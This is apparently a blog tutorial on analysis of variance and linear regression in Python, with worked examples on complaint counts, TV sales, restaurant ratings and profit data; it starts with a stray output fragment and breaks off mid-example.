                df  sum_sq    mean_sq           F        PR(>F)E          1.0    7.22   7.220000   46.444444  7.580723e-07I          1.0   18.00  18.000000  115.789474  3.129417e-10Residual  22.0    3.42   0.155455         NaN           NaN

Since the $P$ values are very small, both the environment and the ingredients have a strong effect on the user ratings
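The formula 'S~E+I' treats the two grades as numeric scores. A variant sketch (not in the original notes) treats them as categorical factor levels instead, which matches the ANOVA framework of Section 15.3.3 more literally; C() marks a variable as categorical in a statsmodels formula:

# Same data, but each grade treated as an unordered factor level
results_cat = anova_lm(ols('S ~ C(E) + C(I)', df).fit())
print(results_cat)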

    ]]>
    + 正文

    15 方差分析

    15.1 方差分析概述

    通过对实验数据进行分析, 检验方差相同的多个正态总体均值是否相等

    实例: 为了对几个行业的服务质量进行评价, 消费者协会在 4 个行业中分别抽取了不同的企业作为样本.最近一年中消费者总共对 23 家企业投诉的次数如下表所示

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import numpy as np
    import pandas as pd

    data = np.array([[57, 68, 31, 44],
    [66, 39, 49, 51],
    [49, 29, 21, 65],
    [40, 45, 34, 77],
    [34, 56, 40, 58],
    [53, 51, None, None],
    [44, None, None, None]])
    df = pd.DataFrame(data, index=range(1, 8), columns=["零售业", "旅游业", "航空业", "家电制造业"])
    df.index.name = "观测值"
    df
    零售业 旅游业 航空业 家电制造业
    观测值
    1 57 68 31 44
    2 66 39 49 51
    3 49 29 21 65
    4 40 45 34 77
    5 34 56 40 58
    6 53 51 None None
    7 44 None None None
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import matplotlib.pyplot as plt

    # 解决中文显示问题
    plt.rcParams['font.sans-serif']=['SimHei']
    plt.rcParams['axes.unicode_minus'] = False

    plt.figure()
    for i in range(data.shape[1]):
    plt.scatter(i * np.ones(data.shape[0]), data.T[i])
    plt.xticks(range(data.shape[1]), ('零售业', '旅游业', '航空业', '家电制造业'))
    plt.ylabel('被投诉次数') # 设置坐标轴名称
    plt.xlabel('行业')
    plt.show()

    png

    从散点图中可以看出, 不同行业被投诉的次数的均值是有差异的, 但这种差异也可能是由抽样的随机性造成的, 需要有更准确的方法来检验这种差异是否显著

15.2 Comparing Variances

• Within-group variance: the variance of the sample data under one level (one population) of a factor, e.g., the variance of the retail industry's complaint counts. Within-group variance contains random error only

• Between-group variance: the variance between the samples under different levels (different populations) of a factor, e.g., the variance between the complaint counts of the 4 industries. Between-group variance contains both random error and systematic error

If industry has no effect on complaint counts, the between-group error contains only random error and no systematic error; after averaging, the between-group and within-group errors are close in size and their ratio is near 1

If industry does affect complaint counts, the between-group error contains systematic error in addition to random error, and the ratio is greater than 1
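As a quick numeric illustration of this ratio logic, here is a minimal sketch on synthetic data (the helper f_ratio and all numbers are my own, not from the book):

import numpy as np

def f_ratio(groups):
    # between-group mean square over within-group mean square (MSA / MSE)
    k = len(groups)
    n = sum(len(g) for g in groups)
    grand = np.mean(np.concatenate(groups))
    msa = sum(len(g) * (g.mean() - grand) ** 2 for g in groups) / (k - 1)
    mse = sum(((g - g.mean()) ** 2).sum() for g in groups) / (n - k)
    return msa / mse

rng = np.random.default_rng(0)
same = [rng.normal(50, 10, 6) for _ in range(4)]             # four groups with identical means
shifted = [rng.normal(m, 10, 6) for m in (40, 50, 60, 70)]   # four groups with different means
print(f_ratio(same), f_ratio(shifted))  # the first hovers around 1, the second is clearly larger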

15.3 Analysis of Variance

15.3.1 One-Way ANOVA

Statistics used in ANOVA:

1 Mean of each level (population)

$$\bar X_i=\frac{1}{n_i}\sum_{j=1}^{n_i}X_{ij},\quad i=1,\dots,k$$

X_bar = []
for i in range(data.shape[1]):
    X_bar.append(data.T[i][data.T[i] != np.array(None)].mean())
X_bar
    [49.0, 48.0, 35.0, 59.0]
2 Grand mean of all observations

The sum of all observations $X_{ij}$ divided by the number of observations

$$\bar{\bar{X}}=\frac{1}{n}\sum_{i=1}^{k}\sum_{j=1}^{n_i}X_{ij}=\frac{1}{n}\sum_{i=1}^{k}n_i\bar{X_i}$$

X_bar_bar = data.T[data.T != np.array(None)].mean()  # "X double bar" -- not sure how to pronounce it...
    X_bar_bar
    47.869565217391305
3 Total sum of squares (SST)

The sum of squared deviations of every observation $X_{ij}$ from the grand mean $\bar{\bar X}$; it reflects the overall dispersion of the data.

$$SST=\sum_{i=1}^{k}\sum_{j=1}^{n_i}(X_{ij}-\bar{\bar X})^2$$

    SST = ((data.T[data.T != np.array(None)] - X_bar_bar) ** 2).sum()
    SST
    4164.608695652174
4 Treatment sum of squares (SSA)

The sum of squared deviations of each level mean $\bar X_i$ from the grand mean $\bar{\bar X}$. To some extent it reflects the variation caused by differences between the population means $\mu_i$; it is also called the between-group sum of squares and contains both random error and systematic error

$$SSA=\sum_{i=1}^{k}\sum_{j=1}^{n_i}(\bar X_i-\bar{\bar X})^2=\sum_{i=1}^{k}n_i(\bar X_i-\bar{\bar X})^2$$

SSA = 0
for i in range(data.shape[1]):
    SSA += len(data.T[i][data.T[i] != np.array(None)]) *\
        (data.T[i][data.T[i] != np.array(None)].mean() - X_bar_bar) ** 2
SSA
    1456.608695652174
5 Error sum of squares (SSE)

Under each population $A_i$, the sum of squared deviations of the observations $X_{ij}$ from the level mean $\bar X_i$; it reflects the variation in $X_{ij}$ due to sampling randomness. Also called the within-group sum of squares, it reflects random error only

$$SSE=\sum_{i=1}^{k}\sum_{j=1}^{n_i}(X_{ij}-\bar{X_i})^2$$

SSE = 0
for i in range(data.shape[1]):
    for j in data.T[i][data.T[i] != np.array(None)]:
        SSE += (j - X_bar[i]) ** 2
SSE
    2708.0
6 Decomposition of the total sum of squares

    $$SST=SSE+SSA$$

7 Degrees of freedom

$SST$ has $n-1$ degrees of freedom, where $n$ is the total number of observations

The treatment sum of squares ($SSA$) has $k-1$ degrees of freedom, where $k$ is the number of factor levels (populations)

The error sum of squares ($SSE$) has $n-k$ degrees of freedom

8 The mean squares MSA and MSE

The mean square of the between-group sum of squares $SSA$ is denoted $MSA$

The mean square of the within-group sum of squares $SSE$ is denoted $MSE$

Each is computed by dividing the sum of squares by its degrees of freedom

Define the test statistic

$$F=\frac{SSA/(k-1)}{SSE/(n-k)}=\frac{MSA}{MSE}\sim F(k-1, n-k)$$

    k = len(data[1])
    n = len(data[data!= np.array(None)])
    F = (SSA / (k - 1)) / (SSE / (n - k))
    F
    3.4066426904716036

The results above can be arranged as a table, called the one-way ANOVA table:

Source    Sum of squares   df    Mean square   F value
Between   SSA              k-1   MSA           MSA/MSE
Within    SSE              n-k   MSE
Total     SST=SSE+SSA      n-1
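To finish the test, the F statistic computed above still has to be compared with its critical value; a short sketch using scipy (the alpha level and variable names here are my own):

from scipy import stats

k, n = 4, 23                               # factor levels, total observations
F = 3.4066426904716036                     # the statistic computed above
F_crit = stats.f.ppf(0.95, k - 1, n - k)   # critical value at alpha = 0.05, about 3.13
p = stats.f.sf(F, k - 1, n - k)            # right-tail p-value, about 0.04
print(F_crit, p)  # F > F_crit and p < 0.05, so industry does affect complaint counts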

15.3.2 Multiple Comparisons in ANOVA

To learn more about how the individual populations of factor A affect the observed variable,

multiple comparison tests compare the population means pairwise to determine exactly which means differ, and to find the best level.

If the null hypothesis $H_0:\mu_i=\mu_j,\ i,j=1,2,\dots,r,\ i\ne j$ holds, the test statistic should be small, so the rejection region is $|\bar X_i-\bar X_j|>t_{\alpha/2}\sqrt{MSE(\frac{1}{n_i}+\frac{1}{n_j})}$

If the rejection condition is met, $\mu_i$ and $\mu_j$ are considered significantly different; otherwise they are not

Example 15.2
    import pandas as pd
    import numpy as np

    data = np.array([[26.5, 31.2, 27.9, 30.8],
    [28.7, 28.3, 25.1, 29.6],
    [25.1, 30.8, 28.5, 32.4],
    [29.1, 27.9, 24.2, 31.7],
    [27.2, 29.6, 26.5, 32.8]])
    df = pd.DataFrame(data, index=range(1, 6), columns=["无色", "粉色", "橘黄色", "绿色"])
    df.index.name = "样本"
    df
    无色 粉色 橘黄色 绿色
    样本
    1 26.5 31.2 27.9 30.8
    2 28.7 28.3 25.1 29.6
    3 25.1 30.8 28.5 32.4
    4 29.1 27.9 24.2 31.7
    5 27.2 29.6 26.5 32.8
X_bar = []
for i in data.T:
    X_bar.append(np.round(i.mean(), 2))
X_bar
    [27.32, 29.56, 26.44, 31.46]
SSE = 0
for i in range(data.shape[1]):
    for j in data.T[i][data.T[i] != np.array(None)]:
        SSE += (j - X_bar[i]) ** 2
SSE
    39.083999999999975
    n = data.size
    k = data.shape[1]
    MSE = SSE / (n - k)
    MSE
    2.4427499999999984

Let the significance level $\alpha=0.05$; then $t_{\alpha/2}(16)=2.12$, with $n_i=n_j=5$ for $i,j=1,2,3,4$

$t_{\alpha/2}\sqrt{MSE(\frac{1}{n_i}+\frac{1}{n_j})}=2.096$

    from scipy.stats import t

    alpha = 0.05
    t_alpha_div_2 = t.ppf(1 - alpha / 2, (n - k))
    t_alpha_div_2
    2.1199052992210112
    np.round(t_alpha_div_2 * np.sqrt(MSE * (1 / data.shape[0] + 1 / data.shape[0])), 3)
    2.095
for i in range(len(X_bar) - 1):
    for j in range(i + 1, len(X_bar)):
        print("|\\bar X_{} - \\bar X_{}| = {}".format(i + 1, j + 1, np.round(np.abs(X_bar[i] - X_bar[j]), 2)))
|\bar X_1 - \bar X_2| = 2.24
|\bar X_1 - \bar X_3| = 0.88
|\bar X_1 - \bar X_4| = 4.14
|\bar X_2 - \bar X_3| = 3.12
|\bar X_2 - \bar X_4| = 1.9
|\bar X_3 - \bar X_4| = 5.02

From these results we can read off the effects.

For example, $|\bar X_1 - \bar X_2|>2.095$, so $X_1$ and $X_2$ differ significantly; that is, colorless and pink have significantly different effects on product sales

$|\bar X_2 - \bar X_4|<2.095$, so $X_2$ and $X_4$ do not differ significantly; that is, pink and green do not have significantly different effects on sales
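statsmodels also ships a ready-made multiple-comparison procedure; a sketch using Tukey's HSD on the same data (note this is a different, more conservative test than the LSD-style comparison above, and the long-format reshaping is my own):

import numpy as np
from statsmodels.stats.multicomp import pairwise_tukeyhsd

scores = data.T.ravel()                                    # flatten column by column (color by color)
labels = np.repeat(['无色', '粉色', '橘黄色', '绿色'], 5)  # one group label per observation
print(pairwise_tukeyhsd(scores, labels, alpha=0.05).summary())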

15.3.3 Multi-Factor ANOVA

• Two-factor sum-of-squares decomposition without interaction: $SST=SSA+SSB+SSE$

• Two-factor sum-of-squares decomposition with interaction: $SST=SSA+SSB+SSAB+SSE$

Source            Sum of squares   df             Mean square                      F value
Factor A          $SSA$            $s-1$          $MSA=\frac{SSA}{s-1}$            $F_A=\frac{MSA}{MSE}$
Factor B          $SSB$            $r-1$          $MSB=\frac{SSB}{r-1}$            $F_B=\frac{MSB}{MSE}$
Interaction A×B   $SSAB$           $(r-1)(s-1)$   $MSAB=\frac{SSAB}{(r-1)(s-1)}$   $F_{AB}=\frac{MSAB}{MSE}$
Error             $SSE$            $rs(m-1)$      $MSE=\frac{SSE}{rs(m-1)}$
Total             $SST$            $rsm-1$

Statistic                   Distribution
$F_A=\frac{MSA}{MSE}$       $F\left[s-1,rs(m-1)\right]$
$F_B=\frac{MSB}{MSE}$       $F\left[r-1,rs(m-1)\right]$
$F_{AB}=\frac{MSAB}{MSE}$   $F\left[(r-1)(s-1),rs(m-1)\right]$

$m$ is the number of replications per cell ($\ge2$). (In Example 15.3 below there is no replication, $m=1$, so the interaction cannot be separated; the decomposition without interaction is used and the error takes $(r-1)(s-1)$ degrees of freedom.)

Example 15.3

$s=4$ brands of color TV are sold in $r=5$ regions. To analyze whether brand and region affect sales volume, the sales of each brand in each region are recorded below. Do brand and region have a significant effect on sales? ($\alpha=0.05$)

    import numpy as np
    import pandas as pd

    data = np.array([[365, 350, 343, 340, 323],
    [345, 368, 363, 330, 333],
    [358, 323, 353, 343, 308],
    [288, 280, 298, 260, 298]])
    df = pd.DataFrame(data, columns=["B1", "B2", "B3", "B4", "B5"],
    index=["A1", "A2", "A3", "A4"])
    df.index.name = "品牌销售表(因素 A)"
    df.columns.name = "销售地区(因素 B)"
    df
    销售地区(因素 B) B1 B2 B3 B4 B5
    品牌销售表(因素 A)
    A1 365 350 343 340 323
    A2 345 368 363 330 333
    A3 358 323 353 343 308
    A4 288 280 298 260 298

$SST=365^2+350^2+\dots+298^2-\frac{6569^2}{20}=17888.95$

    SST = (data ** 2).sum() - data.sum() ** 2 / data.size
    SST
    17888.950000000186

$SSA=\frac{1}{5}(1721^2+1739^2+\dots+1424^2)-\frac{6569^2}{20}=13004.55$

SSA = 0
for i in data:
    SSA += i.sum() ** 2
SSA /= data.shape[1]
SSA -= data.sum() ** 2 / data.size
SSA
    13004.55000000028

$SSB=\frac{1}{4}(1356^2+1321^2+\dots+1262^2)-\frac{6569^2}{20}=2011.7$

SSB = 0
for i in data.T:
    SSB += i.sum() ** 2
SSB /= data.shape[0]
SSB -= data.sum() ** 2 / data.size
SSB
    2011.7000000001863

    $SSE=SST-SSA-SSB=2872.7$

    SSE = SST - SSA - SSB
    SSE
    2872.6999999997206
Source              Sum of squares                     df                    Mean square                               F value
Brand (factor A)    SSA = 13004.55                     s - 1 = 3             MSA = SSA / (s - 1) = 4334.85             MSA / MSE = 18.10777
Region (factor B)   SSB = 2011.7                       r - 1 = 4             MSB = SSB / (r - 1) = 502.925             MSB / MSE = 2.100846
Error               SSE = 2872.7                       (r - 1)(s - 1) = 12   MSE = SSE / ((r - 1)(s - 1)) = 239.3917
Total               SST = SSA + SSB + SSE = 17888.95   rsm - 1 = 19

• Since $F_A=18.108>F_{0.95}(3, 12)=3.49$, brand has a significant effect on TV sales

• Since $F_B=2.101<F_{0.95}(4, 12)=3.26$, region has no significant effect on TV sales
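As a cross-check, the same two-way (no-interaction) ANOVA can be run in statsmodels; a sketch that reshapes the DataFrame above into long form (the column names brand/region/sales are my own):

from statsmodels.formula.api import ols
from statsmodels.stats.anova import anova_lm

long = df.stack().reset_index()                 # one row per (brand, region) cell
long.columns = ['brand', 'region', 'sales']
model = ols('sales ~ C(brand) + C(region)', data=long).fit()
print(anova_lm(model))  # F for brand should be about 18.11 and for region about 2.10, matching the table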

15.4 Comprehensive Example: Analyzing User Ratings of a Restaurant Chain

15.4.1 One-Way ANOVA Example

A restaurant chain has user ratings from 3 cities, shown below. The rating distribution in each city is approximately normal with equal variance. With 95% confidence, does city have a significant effect on the user ratings?

    from scipy.stats import f_oneway
    import scipy.stats as stats
    import numpy as np
    import pandas as pd
    from statsmodels.formula.api import ols
    from statsmodels.stats.anova import anova_lm

    cityA = [10,9,9,8,8,7,7,8,8,9]
    cityB = [10,8,9,8,7,7,7,8,9,9]
    cityC = [9,9,8,8,8,7,6,9,8,9]
    df = pd.DataFrame(np.vstack((cityA, cityB, cityC)), index=['A', 'B', 'C'])
    df.columns.name = "用户评分"
    df.index.name = "城市"
    df
    用户评分 0 1 2 3 4 5 6 7 8 9
    城市
    A 10 9 9 8 8 7 7 8 8 9
    B 10 8 9 8 7 7 7 8 9 9
    C 9 9 8 8 8 7 6 9 8 9
Method 1: the scipy.stats.f_oneway() method
# First check homogeneity of variance: the equal-variance assumption should be
# tested before calling f_oneway; here the Levene test is used
"""
scipy.stats.levene(*samples, center='median', proportiontocut=0.05)
Performs the Levene test for equal variances.
A small p-value suggests the populations do not have equal variances.
"""
(W, p) = stats.levene(cityA, cityB, cityC)
if p < 0.05:
    print(('Warning: the p-value of the Levene test is <0.05: p = {0}'.format(p)))
# One-way ANOVA
# Method 1
F_statistic, pVal = stats.f_oneway(cityA, cityB, cityC)
print('One-way ANOVA (f_oneway): F = {0}, and p = {1}'.format(F_statistic, pVal))
if pVal < 0.05:
    print('One of the groups is significantly different.')
One-way ANOVA (f_oneway): F = 0.10150375939849626, and p = 0.9038208903685354
Method 2: use anova_lm from statsmodels, performing the ANOVA with a linear OLS model
# One-way ANOVA
# Method 2: statsmodels
# Put the data into a DataFrame
df = pd.DataFrame()
names = locals()
for city in ['A','B','C']:
    s = names['city%c' % city]
    df_temp = pd.DataFrame({'city':city[-1], 'S':s})
    df = pd.concat([df, df_temp], ignore_index=True)
# Run the ANOVA on a linear OLS model
model = ols('S ~ city', df).fit()
anovaResults = anova_lm(model)
print('One-way ANOVA (anova_lm):')
print(anovaResults)
df
One-way ANOVA (anova_lm):
            df  sum_sq   mean_sq         F    PR(>F)
city       2.0     0.2  0.100000  0.101504  0.903821
Residual  27.0    26.6  0.985185       NaN       NaN
    city S
    0 A 10
    1 A 9
    2 A 9
    3 A 8
    4 A 8
    5 A 7
    6 A 7
    7 A 8
    8 A 8
    9 A 9
    10 B 10
    11 B 8
    12 B 9
    13 B 8
    14 B 7
    15 B 7
    16 B 7
    17 B 8
    18 B 9
    19 B 9
    20 C 9
    21 C 9
    22 C 8
    23 C 8
    24 C 8
    25 C 7
    26 C 6
    27 C 9
    28 C 8
    29 C 9
3 Compute the sums of squares by hand to implement one-way ANOVA
from scipy.stats import f_oneway
import scipy.stats as stats
import numpy as np
import pandas as pd

cityA = [10,9,9,8,8,7,7,8,8,9]
cityB = [10,8,9,8,7,7,7,8,9,9]
cityC = [9,9,8,8,8,7,6,9,8,9]
df = pd.DataFrame()
names = locals()
for city in ['A','B','C']:
    s = names['city%c' % city]
    df_temp = pd.DataFrame({'city':city[-1], 'S':s})
    df = pd.concat([df, df_temp], ignore_index=True)
groups = df.groupby('city')
# The "total sum-square" is the squared deviation from the mean
ss_total = np.sum((df['S'] - df['S'].mean()) ** 2)
# Compute SSE and SSA
(ss_treatments, ss_error) = (0, 0)
for val, group in groups:
    ss_error += sum((group['S'] - group['S'].mean()) ** 2)
    ss_treatments += len(group) * (group['S'].mean() - df['S'].mean()) ** 2
df_groups = len(groups) - 1
df_residuals = len(df) - len(groups)
F = (ss_treatments / df_groups) / (ss_error / df_residuals)
f_dist = stats.f(df_groups, df_residuals)  # use a fresh name so the DataFrame df is not shadowed
p = f_dist.sf(F)
print(('One-way ANOVA (manual): F = {0}, and p = {1}'.format(F, p)))
One-way ANOVA (manual): F = 0.1015037593984973, and p = 0.9038208903685354

Since $F<F_{0.05}(2, 27)=3.35$ and $P>0.05$, the null hypothesis stands: we cannot conclude that city affects the user ratings
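The critical value quoted here can be verified with scipy (a one-line check of my own):

from scipy import stats

stats.f.ppf(0.95, 2, 27)  # about 3.354, the F_0.05(2, 27) critical value used above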

15.4.2 Multi-Factor ANOVA Example

Collect user rating data for the restaurant chain under two factors: environment grade (environment) and ingredient grade (ingredients)

# Two factors affecting the restaurant: environment grade and ingredient grade
    from scipy import stats
    import pandas as pd
    import numpy as np
    from statsmodels.formula.api import ols
    from statsmodels.stats.anova import anova_lm
    environmental = [5,5,5,5,5,4,4,4,4,4,3,3,3,3,3,2,2,2,2,2,1,1,1,1,1]
    ingredients = [5,4,3,2,1,5,4,3,2,1,5,4,3,2,1,5,4,3,2,1,5,4,3,2,1]
    score = [5,5,4,3,2,5,4,4,3,2,4,4,3,3,2,4,3,2,2,2,3,3,3,2,1]
data = {'E':environmental, 'I':ingredients, 'S':score} # E = environment, I = ingredients, S = score
    df = pd.DataFrame(data)
    df
    E I S
    0 5 5 5
    1 5 4 5
    2 5 3 4
    3 5 2 3
    4 5 1 2
    5 4 5 5
    6 4 4 4
    7 4 3 4
    8 4 2 3
    9 4 1 2
    10 3 5 4
    11 3 4 4
    12 3 3 3
    13 3 2 3
    14 3 1 2
    15 2 5 4
    16 2 4 3
    17 2 3 2
    18 2 2 2
    19 2 1 2
    20 1 5 3
    21 1 4 3
    22 1 3 3
    23 1 2 2
    24 1 1 1

Use the anova_lm module from statsmodels to perform the multi-factor ANOVA

    """
    符号意义:
    (~)隔离自变量和因变量(左边因变量, 右边自变量)
    (+)分离各个自变量
    """
    formula = 'S~E+I'
    results = anova_lm(ols(formula,df).fit() )
    print(results)
                df  sum_sq    mean_sq           F        PR(>F)E          1.0    7.22   7.220000   46.444444  7.580723e-07I          1.0   18.00  18.000000  115.789474  3.129417e-10Residual  22.0    3.42   0.155455         NaN           NaN

Since the $P$ values are very small, both environment and ingredients have a strong effect on the user ratings
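With only one observation per (E, I) cell, a full categorical interaction would leave no residual degrees of freedom; if an interaction check is still wanted, one option is a numeric product term (a sketch; this extension of the example is my own):

results_inter = anova_lm(ols('S ~ E + I + E:I', df).fit())
print(results_inter)  # a small F / large p for E:I would suggest no interaction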


14 Regression Analysis

14.1 Overview of Regression Analysis

14.1.2 Simple Linear Regression Model

In general, if the independent variable $x$ and the dependent variable $y$ are related as follows, the relationship is called a simple linear regression model

    $$y=\beta_0+\beta_1x+\varepsilon, \varepsilon\sim N(0, \sigma^2)$$

Variable        Meaning
$x$             independent variable
$y$             dependent variable
$\beta_0$       regression constant (intercept)
$\beta_1$       regression coefficient (slope)
$\varepsilon$   random error
$\sigma^2$      variance

14.2 Deriving the Regression Equation and Its Uses

14.2.1 The Regression Equation

From $n$ sample observations, estimate the unknown parameters $\beta_0$ and $\beta_1$, denoted $\hat{\beta_0}, \hat{\beta_1}$; then $\hat{y}=\hat{\beta_0}+\hat{\beta_1}x$ is called the empirical regression equation of $y$ on $x$, or simply the regression equation

14.2.2 Least Squares Estimation of the Parameters

"二乘" ~ multiplied twice ~ squared

Basic principle: the best-fit line should minimize the sum of squared distances from the sample points to the regression line

$$Q=\sum_{i=1}^{n}(y_i-\beta_0-\beta_1x_i)^2$$

Solving yields

$$\left\{\begin{matrix}
\beta_0=\bar y-\beta_1\bar x\\
\beta_1=\frac{\sum_{i=1}^{n}x_iy_i-n\bar x\bar y}{\sum_{i=1}^{n}x^2_i-n\bar x^2}=\frac{L_{xy}}{L_{xx}}
\end{matrix}\right.$$

Example 14.2: Finding a linear regression equation

A company studies the relationship between the output value $x$ (10,000 yuan) of a class of products and the gross profit $y$ (10,000 yuan):

    import numpy as np
    import pandas as pd

    tang = np.array([range(100, 200, 10), [45, 51, 54, 61, 66, 70, 74, 78, 85, 89]], dtype=int)
    df = pd.DataFrame(tang, columns=range(1, 11), index=["产值 x", "毛利润 y"])
    df.columns.name = "月份"
    df
    月份 1 2 3 4 5 6 7 8 9 10
    产值 x 100 110 120 130 140 150 160 170 180 190
    毛利润 y 45 51 54 61 66 70 74 78 85 89

Find the linear regression equation of gross profit $y$ on output value $x$

    $n=10, \bar x=\frac{1}{n}\Sigma^n_{i=1}x_i=145, \bar y=\frac{1}{n}\Sigma^n_{i=1}y_i=67.3$

    n = len(tang[0])
    x_bar = tang[0].mean()
    y_bar= tang[1].mean()
    n, x_bar, y_bar
    (10, 145.0, 67.3)

$L_{xx}=\sum_{i=1}^{n}x^2_i-n\bar x^2=8250$

    $L_{xy}=\Sigma^n_{i=1}x_iy_i-n\bar x\bar y=3985$

    L_xx = (tang[0] ** 2).sum() - n * x_bar ** 2
    L_xy = (tang[0] * tang[1]).sum() - n * x_bar * y_bar
    L_xx, L_xy
    (8250.0, 3985.0)

    $\hat{\beta_1}=\frac{L_{xy}}{L_{xx}}=\frac{3985}{8250}=0.48303$

    $\hat{\beta_0}=\bar y-\hat{\beta_1}\bar x=67.3-0.48303 * 145 = -2.73935$

The regression equation is:

    $\hat y = -2.73935+0.48303x$

    beta_1 = L_xy / L_xx
    beta_0 = y_bar - beta_1 * x_bar
    beta_0, beta_1
    (-2.739393939393949, 0.48303030303030303)

Implementing the linear regression with sklearn

import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import linear_model

tang = np.array([range(100, 200, 10), [45, 51, 54, 61, 66, 70, 74, 78, 85, 89]], dtype=int)
regr = linear_model.LinearRegression()
"""
https://www.iotword.com/2556.html
.reshape(-1, 1)
In sklearn all input data must be a 2-D matrix, even when it is a single row
or column (e.g. predicting from one sample), so numpy's .reshape(-1, 1) is
used to convert the 1-D arrays.
"""
regr.fit(tang[0].reshape(-1, 1), tang[1].reshape(-1, 1))
regr.intercept_[0], regr.coef_[0][0]
    (-2.739393939393949, 0.48303030303030303)
    plt.figure()
    plt.scatter(tang[0], tang[1])
    x = np.array([100, 190])
    y = regr.predict(x.reshape(-1, 1))
    plt.plot(x, y, color="red", alpha=0.75)
    plt.show()

[figure: data scatter with the fitted regression line]

14.2.3 Estimating the Variance $\sigma^2$

The unbiased estimator $\hat{\sigma^2}$ of $\sigma^2$ (unbiased meaning $E(\hat{\sigma^2})=\sigma^2$):

$\hat{\sigma^2}=\frac{1}{n-2}(L_{yy}-\hat{\beta_1}L_{xy})$, where $L_{yy}=\Sigma^n_{i=1}(y_i-\bar y)^2=\Sigma^n_{i=1}y^2_i-n\bar y^2$
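Applying the formula to the Example 14.2 data gives a quick sketch (reuses tang, n, y_bar, beta_1, L_xy from above; the value in the comment is my own calculation):

L_yy = (tang[1] ** 2).sum() - n * y_bar ** 2
sigma2_hat = (L_yy - beta_1 * L_xy) / (n - 2)
sigma2_hat  # roughly 0.90 for this data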

14.3 Goodness of Fit of the Regression Line

14.3.1 Measures of Variation in the Dependent Variable y

• Total sum of squares (SST): $\Sigma^n_{i=1}(y_i-\bar y)^2$, the total deviation of the $n$ observations $y_i$ from their mean $\bar y$

• Regression sum of squares (SSR): $\Sigma^n_{i=1}(\hat y_i-\bar y)^2$, the part of the total variation in $y$ explained by the linear relationship between $x$ and $y$

• Residual sum of squares (SSE): $\Sigma^n_{i=1}(y_i-\hat y_i)^2$, the variation in $y$ caused by factors other than the linear influence of $x$; the part the regression line cannot explain

SST = SSR + SSE

14.3.2 The Coefficient of Determination

$$R^2=\frac{SSR}{SST}=\frac{\hat{\beta_1}L_{xy}}{L_{yy}}$$

It is simply the square of the Pearson correlation coefficient…
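Continuing with the Example 14.2 quantities (a sketch; assumes L_yy from the variance sketch above):

R2 = beta_1 * L_xy / L_yy
R2  # about 0.996: the line explains nearly all the variation in y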

14.4 Testing the Linear Regression Model

14.4.1 Significance Test of the Linear Relationship

14.4.2 Significance Test of the Regression Coefficient

Just plug into the formulas… I'm tired

14.5 Estimation and Prediction with the Regression Line

Prediction intervals vs. confidence intervals:

• Prediction interval: for a given value $x_0$ of the independent variable, a point and interval estimate of the predicted value $\hat{y_0}$ of $y$ (an individual value)

• Confidence interval: for a given value $x_0$, an estimate of the mean of $y_0$ and its interval, i.e., estimating the mean value $E(\hat{y_0})$

Just plug into the formulas… I'm tired (see the statsmodels sketch below)
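Rather than plugging the formulas in by hand, statsmodels can produce both intervals; a sketch on the Example 14.2 data (the variable names and the choice x0 = 150 are mine):

import numpy as np
import statsmodels.api as sm

x = np.arange(100, 200, 10)
y = np.array([45, 51, 54, 61, 66, 70, 74, 78, 85, 89])
res = sm.OLS(y, sm.add_constant(x.astype(float))).fit()
pred = res.get_prediction([[1, 150]])   # predict at x0 = 150
print(pred.summary_frame(alpha=0.05))   # mean_ci_* = confidence interval, obs_ci_* = prediction interval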

14.6 Multiple and Curvilinear Regression

14.6.1 Multiple Linear Regression Analysis

Multiple linear regression is linear regression with several independent variables and one dependent variable

Let's go straight to an example, no proofs

Example 14.8

Suppose we have a dataset with 4 features (independent variables) and 1 dependent variable:

    import numpy as np
    import pandas as pd

    data = np.array([[2104, 5, 1, 15, 368],
    [1416, 3, 2, 10, 200],
    [1534, 3, 2, 5, 280],
    [852, 2, 1, 7, 126]])
    df = pd.DataFrame(data, columns=["x1", "x2", "x3", "x4", "y"])
    df
    x1 x2 x3 x4 y
    0 2104 5 1 15 368
    1 1416 3 2 10 200
    2 1534 3 2 5 280
    3 852 2 1 7 126

    利用"最小二乘法"求解回归模型时, 需要将特征(自变量)和因变量分解:

$\mathbf{X}= \begin{bmatrix}
1 & 2104 & 5 & 1 & 15 \\
1 & 1416 & 3 & 2 & 10 \\
1 & 1534 & 3 & 2 & 5 \\
1 & 852 & 2 & 1 & 7
\end{bmatrix}$,
$\mathbf{Y}= \begin{bmatrix}
368 \\
200 \\
280 \\
126
\end{bmatrix}$, where the extra column of 1s in $\mathbf{X}$ corresponds to the coefficient $\beta_0$

    X = np.hstack((np.mat([[1], [1], [1], [1]]),np.mat(data.T[0:4]).T))
    Y = np.mat(data.T[4]).T
    X, Y
(matrix([[   1, 2104,    5,    1,   15],
         [   1, 1416,    3,    2,   10],
         [   1, 1534,    3,    2,    5],
         [   1,  852,    2,    1,    7]]),
 matrix([[368],
         [200],
         [280],
         [126]]))

Substituting into the parameter formula $\beta=(\mathbf X^T\mathbf X)^{-1}(\mathbf X^T\mathbf Y)$ yields

    beta = (X.T * X) ** (-1) * (X.T * Y)
    beta
matrix([[-5632.],
        [    8.],
        [-4096.],
        [    0.],
        [    0.]])

$y=-5632+8x_1-4096x_2$

(Note: with only 4 observations and 5 parameters, $\mathbf X^T\mathbf X$ is rank-deficient, so the zero coefficients for $x_3$ and $x_4$ are a numerical artifact rather than a meaningful estimate.)

14.6.2 Curvilinear Regression Analysis

Curvilinear regression is usually handled by algebraic substitution, converting the nonlinear form into a linear one, as in the sketch below
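For instance, an exponential curve $y=ae^{bx}$ becomes a straight line after taking logs: $\ln y=\ln a+bx$. A minimal sketch with made-up data (all names and numbers here are mine):

import numpy as np

x = np.array([1, 2, 3, 4, 5], dtype=float)
y = 2.0 * np.exp(0.5 * x)                 # synthetic points lying on the curve
b, ln_a = np.polyfit(x, np.log(y), 1)     # straight-line fit in the transformed space
print(np.exp(ln_a), b)                    # recovers a = 2.0 and b = 0.5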

14.7 Python Toolkits

14.7.2 Regression Analysis with statsmodels

Example 14.11

Generate an arithmetic sequence of 50 numbers from -10 to 10 as the independent variable $x$; the dependent variable is $y=3+6x+2x^3+e$, where $e$ is an error term with $e\sim N(0, 1)$

import numpy as np
import matplotlib.pyplot as plt
import statsmodels.api as sm # least squares
from statsmodels.stats.outliers_influence import summary_table

# The regression formula is: y = 3 + 6x + 2x^3 + e
# 1. Set the number of data points
nsample = 50
# 2. Create an array for x: 50 evenly spaced values from -10 to 10.
